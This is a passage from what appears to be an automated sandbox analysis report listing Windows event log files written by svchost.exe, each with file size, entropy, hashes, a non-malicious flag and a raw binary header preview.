Preview:	ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0646587531847893
Encrypted:	false
SSDEEP:	384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
MD5:	399CAF70AC6E1E0C918905B719A0B3DD
SHA1:	62360CD0CA66E23C70E6DE3340698E7C0D789972
SHA-256:	FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
SHA-512:	A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
Malicious:	false
Preview:	ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4364303862010575
Encrypted:	false
SSDEEP:	384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
MD5:	2BB73ACC8F7419459C4BF931AB85352C
SHA1:	F1CE2EB960D3886F76094E2327DD092FC1208C7E
SHA-256:	1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
SHA-512:	7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
Malicious:	false
Preview:	ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m..............................%................ ..................&............0......................*......p..........T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.0631557320109892
Encrypted:	false
SSDEEP:	384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
MD5:	86AEA3A9CA3E5909FD44812754E52BD6
SHA1:	F79B583F83F118AC724A5A4206FC439B88BB8C65
SHA-256:	2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
SHA-512:	17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
Malicious:	false
Preview:	ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4467272005363894
Encrypted:	false
SSDEEP:	384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
MD5:	155681C222D825199B738E8DEC707DC8
SHA1:	704C800E7313F77A218203554E1428DF2819BC34
SHA-256:	1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
SHA-512:	ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
Malicious:	false
Preview:	ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.156155224835584
Encrypted:	false
SSDEEP:	384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
MD5:	F22AC858C2ACC96E8F189E43FFE46FBD
SHA1:	540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
SHA-256:	771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
SHA-512:	B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
Malicious:	false
Preview:	ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9197999988543422
Encrypted:	false
SSDEEP:	384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
MD5:	6C3F290FC62CFA9C240AEE8DB1DBA277
SHA1:	CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
SHA-256:	7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
SHA-512:	D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
Category:	dropped
Size (bytes):	76040
Entropy (8bit):	4.551685398568497
Encrypted:	false
SSDEEP:	768:JLjpPv++M48PFVbUa+52j6LjpPv++M48PFVbUa+52jyY20sMY3Dp13/n/ydIxm6c:bU
MD5:	D7FAC000E8F833A09029633F2D80D4F8
SHA1:	54CAA6333B82E5D3FAB81C8614C971A0258C288D
SHA-256:	E8A82460CEE168F5FDB02EA5C31E287F42BD9B165DB485F52E4D8CB55FFF16DA
SHA-512:	03FCECA6B97282BA2D1BFEA3A494AE0E0EA0F1504B322BF931EACC1A3DB4FD7CAA3381EA1B257988DF88C3839D1F2E9D9363897A1CC7D5F8C97053833C74D2D6
Malicious:	false
Preview:	ElfFile.....................................................................................................................I..ElfChnk......................................$...(...il.....................................................................k...................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	75880
Entropy (8bit):	5.700069043094079
Encrypted:	false
SSDEEP:	384:Bhka5a29o2KLzyzIz7a5QzuzNz0zxzuewKWMKYa5i0hka5a29o2KLzyzIz7a5Qze:BHk0HkAtWpSFNWuV6PfS7c
MD5:	16CCF2E39D0F94601315CA4B84A958FA
SHA1:	1EAB2C9C5BB4B15DAA500F9DCF120C0447C10287
SHA-256:	BC75B1048966FEDFCBF30DB7715B195B22FE7478D53F9AB1747302C37D2DC891
SHA-512:	41DC46939F1A741B2A9C4E3D14146165255ED7C4BCC030837B7B75A1B4C78B75A6BEF5D84DA49847B2921C4A1475EB025A098C0FA9FCB3347086D969A7E51425
Malicious:	false
Preview:	ElfChnk.A.......C.......A.......C............$..h(...v=........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................%..........**......A...........1.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9963080376858662
Encrypted:	false
SSDEEP:	384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
MD5:	A51AFE78FA4481FA05EDC1133C92B1D8
SHA1:	5BA44E7A99EE615E323696742DA6B930E9FF6198
SHA-256:	44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
SHA-512:	792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
Malicious:	false
Preview:	ElfChnk......................................)..0-....\.....................................................................\|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.076996627399968
Encrypted:	false
SSDEEP:	384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
MD5:	A8ADBDC2B39B55444B2C844F7D81EBDE
SHA1:	F97F40E314C8A2A39953A28CB72C9270D3073418
SHA-256:	93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
SHA-512:	922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
Malicious:	false
Preview:	ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.224121476511546
Encrypted:	false
SSDEEP:	384:ihhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGj:ihZxGp9b1
MD5:	9B3B244C997316E5AAF45EE5357F8CB9
SHA1:	7D7096D753E558A7A78A1BF2C48595AA6FEA4411
SHA-256:	65242DABB1E89A773F64009609067D8EE68DD749EF4DAB2CDFC69381A588429D
SHA-512:	C66504634D10769BADED620519A481FE86D08C75EB172967111DD0D0AB71D19DD01381FA6A0CCC0A12F57E77CACA0C3B06150DB765A8F5C38E069C0FF6747640
Malicious:	false
Preview:	ElfChnk.T...............T...................P...h....N.U....................................................................Q...........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.801423310886069
Encrypted:	false
SSDEEP:	384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
MD5:	9EAAD7982F42DFF47B8EF784DD2EE1CC
SHA1:	542608204AF6B709B06807E9466F7543C0F08818
SHA-256:	5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
SHA-512:	036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
Malicious:	false
Preview:	ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.996272372482282
Encrypted:	false
SSDEEP:	768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
MD5:	4F68D6AF0C7DB9E98F8B592C9A07811C
SHA1:	9F519109344DD57150F16B540AAA417483EF44FE
SHA-256:	44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
SHA-512:	E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
Malicious:	false
Preview:	ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	224288
Entropy (8bit):	4.0578208166728915
Encrypted:	false
SSDEEP:	6144:KgfRTFgfRqggfRTFgfRq5gfR+EgfRXbgfR6QgfRTFgfRqR:H
MD5:	DCAEFB4CFE6B5597E2695AE712E2F52C
SHA1:	DA2755B33D3C77DB2079940CC731FFE2A4786DB5
SHA-256:	1456AC5A3205834F62C107952CC079610EEF4188C02C66AE2ED9807B09321EEF
SHA-512:	ADE8BEC992D50812CA2C3570A416AAA2B37E7B7A7F621054A3C1A837DE3650FE714C07BDEA6E76572BAD85197F70361F37B35E0DA490B6552C0715315A20A41E
Malicious:	false
Preview:	ElfChnk......................................i.. l..T.......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................aj..............................................................................&...................................**.. 6..............1.............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.743586753696042
Encrypted:	false
SSDEEP:	768:GkN2cTOsKfIPHa4SAdRNlfhvd7NrjzDbRt:OcisgIPQAdRNlfhvd53R
MD5:	977AF26CE27A3396A72725FBF098FB2F
SHA1:	D6BCC1A9773B4A28E04298A757BE89325A07817E
SHA-256:	373BFFB927967A5A8C5B30F9CAD4707946971F64C431877D0101572E7DFD692A
SHA-512:	72A55A5A41072F32D7FC273FCD2E948949F834E17345F6964BF84963C1B1E6174003E5C52A5D49857701DB62AA9A6B8C617C4C14FB12F38D4880C40213BF20DB
Malicious:	false
Preview:	ElfChnk.........................................p............................................................................r..................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7590316238843728
Encrypted:	false
SSDEEP:	384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
MD5:	B074238315662886E2BD70106D08A747
SHA1:	5ADA158D19401565E76349FCA97489E9FB9BFA36
SHA-256:	53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
SHA-512:	9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
Malicious:	false
Preview:	ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.7511849914008617
Encrypted:	false
SSDEEP:	1536:qXhPUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:qX5nS
MD5:	7C35AE7799444BA51305F08470819182
SHA1:	69F7281E876D4DDF12172D988F6A689E7B43CE79
SHA-256:	24FC5B64AD7AACD89BD3111C8402AD478229733A1DC5238ABDA6002590904FC1
SHA-512:	6725720CE21C9023BF6EF3CDC390095388EF33EE2973FE61DCC934B91750693191F3B680DED871CB38CB27B345F5C38F69FD667E270FD3011C35ADA07F3CB780
Malicious:	false
Preview:	ElfChnk.........%...............%............E..`G...X.S....................................................................B.!.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3069197485541766
Encrypted:	false
SSDEEP:	768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
MD5:	E6E4C860CE7DD1BB499D6A082B461B90
SHA1:	11330861B23B1D29D777D9BD10619A07B6A6A9C0
SHA-256:	C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
SHA-512:	7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
Malicious:	false
Preview:	ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&........................................................................l..............]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	127536
Entropy (8bit):	4.001162306513506
Encrypted:	false
SSDEEP:	768:ah0w+qLpBVi7CPME79nCxkSqDh0w+qLpBVi7CPME79nCxkSqc5:c0w+qtBViW0w+qtBViD5
MD5:	188278CD4E5CCB184C0D5C5F8AE14E5A
SHA1:	06549039C676007C26084A2D86C9460F201A1DD6
SHA-256:	0A93B55EEFDE1A64F92514B5F7FC43B8393E8009633C1E6F5D08FAE20FEB9035
SHA-512:	99E813233D5753BDE4F01892146763060E6107D6EC9585FA655855825800A3C7A10B0DD21A24DBE8F18D2CC234CD72D3207B73842286B970FF1B4BEC88E129CE
Malicious:	false
